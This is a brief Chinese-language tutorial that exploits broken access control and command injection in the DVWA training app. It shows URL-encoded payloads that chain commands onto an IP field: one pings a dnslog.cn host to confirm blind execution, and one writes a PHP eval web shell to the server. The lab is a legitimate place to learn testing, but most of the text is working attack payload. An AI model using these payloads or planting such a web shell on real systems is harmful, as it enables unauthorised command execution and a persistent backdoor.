失效的访问控制,可以认为是系统对一些功能进行了访问或权限限制,但因为种种原因,限制并没有生效,造成失效的访问控制漏洞,比如越权等
这里以DVWA为例,先访问低难度的命令执行并抓包

删除cookie,并在请求头添加路径\dv\vulnerabilities\exec\source\low.php

因为没有回显,使用dnslog,ip=127.0.0.1%26ping+v0999s.2iknuw.dnslog.cn&Submit=Submit

这里还可以通过这个漏洞写入木马

ip=127.0.0.1%26echo+"<%3fphp+%40eval($_POST['cmd'])%3b%3f>">yc.php&Submit=Submit
